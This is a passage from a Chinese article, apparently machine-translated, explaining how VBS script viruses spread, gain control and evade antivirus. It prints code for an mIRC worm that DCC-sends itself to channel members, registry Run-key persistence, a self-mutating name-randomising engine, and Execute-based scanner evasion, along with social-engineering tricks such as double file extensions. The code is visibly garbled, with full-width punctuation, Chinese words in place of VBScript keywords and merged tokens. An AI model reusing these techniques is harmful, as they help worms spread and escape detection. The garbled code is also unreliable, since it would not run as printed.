VBS脚本病毒原理分析与预防(2)

Apple0bject.setCLSID（“ {F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}”）

Apple0bject.createInstance（）'创建一个实例

SetWsShellApple0bject.Get0bject（）

Apple0bject.setCLSID（“ {0D43FE01-F093-11CF-8940-00A0C9054228}”）

Apple0bject.createInstance（）'创建一个实例

SetFSO = Apple0bject.Get0bject（）

对于其他类型的文件，我们将不在此处一一分析.

4）通过IRC聊天频道传播

通过IRC传播的病毒通常使用以下代码（以MIRC为例）

暗影

setfso = CreateObject（“ Scripting.FileSystemObject”）

setmirc = fso.CreateTextFile（“ C: \ mirc \ script.ini”）'创建文件script.ini

fso.CopyFileWscript.ScriptFullName，“ C: \ mirc \ attachment.vbs”，True'将病毒文件备份到附件.vbs

mirc.WriteLine“ [脚本]”

mirc.WriteLine“ n0 = on1: join: *. *: {if（$ nick！= $ me）{halt} /dccsend$nickC:\mirc\attachment.vbs}”

'使用/ddcsend$nickattachment.vbs命令将病毒文件传输给频道中的其他用户

关闭.

以上代码用于将一行代码写入Script.ini文件. 实际上，将编写许多其他代码. 用于控制IRC会话的命令存储在Script.ini中. 该文件中的命令可以自动执行. 例如，“歌曲昆虫”病毒TUNE.VBS将修改c: \ mirc \ script.ini和c: \ mirc \ mirc.ini，以便每次IRC用户使用受感染的频道时vbs病毒，他们将收到通过发送的副本DDC TUNE.VBS. 同样，如果将Pirch98安装在目标计算机的c: \ pirch98目录中，则病毒将修改c: \ pirch98 \ events.ini和c: \ pirch98 \ pirch98.ini，以便每当IRC用户使用受感染的频道时，您都会收到通过DDC发送的TUNE.VBS副本.

此外，病毒可以通过现已流行的KaZaA传播. 该病毒会将病毒文件复制到KaZaA的默认共享目录，以便其他用户访问该计算机时，可以下载并执行该病毒文件. 这种通信方法可能随着KaZaA等对等共享工具的普及而发挥作用.

还有其他一些交流方法，我们将不在这里列出.

3. VBS脚本病毒如何获得控制权

如何获得控制权？这是一个更有趣的话题，VBS脚本病毒似乎充分利用了这个话题. 作者在此处列出了几种典型方法:

1）修改注册表项

Windows启动时，它将自动加载定向到HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run项目下的每个键值的程序. 脚本病毒可以在此项目下为病毒程序添加一个关键值，以便您可以确保在每次计算机启动时都得到控制. vbs修改存储表的方法比较简单，只需直接调用以下语句即可.

wsh.RegWrite（strName，anyvalue [，strType]）

2）通过映射文件执行方法

例如，我们新的欢乐时光将dll的执行方法修改为wscript.exe. 您甚至可以将exe文件映射指向病毒代码.

3）欺骗用户，让用户自己执行

此方法实际上与用户的心理有关. 例如，当病毒发送附件时，将使用带有双后缀的文件名. 由于默认情况下不显示后缀，例如，文件名为beauty.jpg.vbs的vbs程序显示为beauty.jpg. 将其单击为图片. 同样，对于用户自己磁盘中的文件，当病毒感染它们时，会将原始文件的文件名用作前缀，将vbs用作后缀以生成病毒文件，然后删除原始文件. 这样，用户可以复制vbs文件. 作为您自己的原始文件运行.

4）Desktop.ini和folder.htt相互配合

这两个文件可用于配置活动桌面或自定义文件夹. 如果用户的目录包含这两个文件，则当用户进入目录时，文件夹.htt中的病毒代码将被触发. 这是“新欢乐时光”病毒用于控制的相对有效的方法. 并且使用folder.htt还可能触发exe文件，这也可能成为病毒获得控制权的有效方法！

病毒可以通过多种方式获得控制权，并且作者在这方面还有更大的发挥空间.

4. vbs脚本病毒针对杀毒软件的几种技术

要使病毒生存，还必须具备与杀毒软件对抗的能力. 通常，VBS脚本病毒使用以下方法来对抗防病毒软件:

1）自加密

例如，新的欢乐时光病毒可以随机选择一个密钥来加密和转换其部分代码，从而使每次感染的病毒代码都不同，从而达到了多态的效果. 这给传统的特征值检查方法带来了一些困难. 该病毒还可以进一步采用变形技术，使每次感染后加密病毒的解密代码不同.

让我们看一个简单的vbs脚本转换引擎（来自flyshadow）

随机化

SetOf = CreateObject（“ Scripting.FileSystemObject”）'创建文件系统对象

vC = Of.OpenTextFile（WScript.ScriptFullName，1）.Readall'读取自己的代码

fS = Array（“ Of”，“ vC”，“ fS”，“ fSC”）'定义要替换的字符数组

ForfSC = 0To3

vC =替换（vC，fS（fSC），Chr（（Int（Rnd * 22）+65））＆Chr（（Int（Rnd * 22）+65））＆Chr（（Int（Rnd * 22） ）+ 65））＆Chr（（Int（Rnd * 22）+65）））'取4个随机字符替换数组fS中的字符串

下一步

Of.OpenTextFile（WScript.ScriptFullName，2,1）.WritelinevC'将替换后的代码写回到文件中

上面的代码使VBS文件的Of，vC，fS，fSC四个字符串在每次运行后都被随机字符串替换，这可以很大程度上防止防病毒软件使用特征值.

2）巧妙地使用Execute函数

曾经使用过VBS程序的朋友会发现它很奇怪: 在正常程序中使用FileSystemObject对象时，某些防病毒软件将报告扫描该程序时此Vbs文件的风险很高，但是某些VBS脚本病毒也使用FileSystemObject对象，为什么没有警告？原因很简单，因为这些病毒巧妙地使用了Execute方法. 当检测到VBS病毒时，某些防病毒软件会检查程序中是否声明了FileSystemObject对象. 如果使用，它将发送警报. 如果病毒将该声明代码转换为字符串，然后通过Execute（String）函数执行该代码，则可以避免使用某些防病毒软件.

本文来自电脑杂谈，转载请注明本文网址：
http://www.pc-fly.com/a/ruanjian/article-208196-2.html